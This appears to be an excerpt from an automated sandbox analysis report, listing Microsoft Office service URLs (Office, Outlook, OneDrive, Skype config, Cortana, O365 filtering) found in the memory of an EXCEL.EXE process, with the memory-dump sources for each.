    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://augloop.office.com
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: EXCEL.EXE, 00000000.00000003.792419093.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.980076150.000000000D342000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728506712.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829142024.0000000012A3F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
    Source: EXCEL.EXE, 00000000.00000003.712956120.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844792206.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.980144579.000000000D3B2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656130823.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885932857.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.830927828.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843000292.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728531297.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792438393.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829149171.0000000012A43000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843806955.0000000012A43000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://cdn.entity.
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: EXCEL.EXE, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell92
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://client-office365-tas.msedge.net/abG
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://clients.config.office.net/
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/Aj
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728506712.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://config.edge.skype.com
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://cortana.ai
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://cortana.ai/api
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://cortana.ai8BO
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://cortana.aietl
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://cr.office.com
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com-
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com0
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comL
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.como
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comr
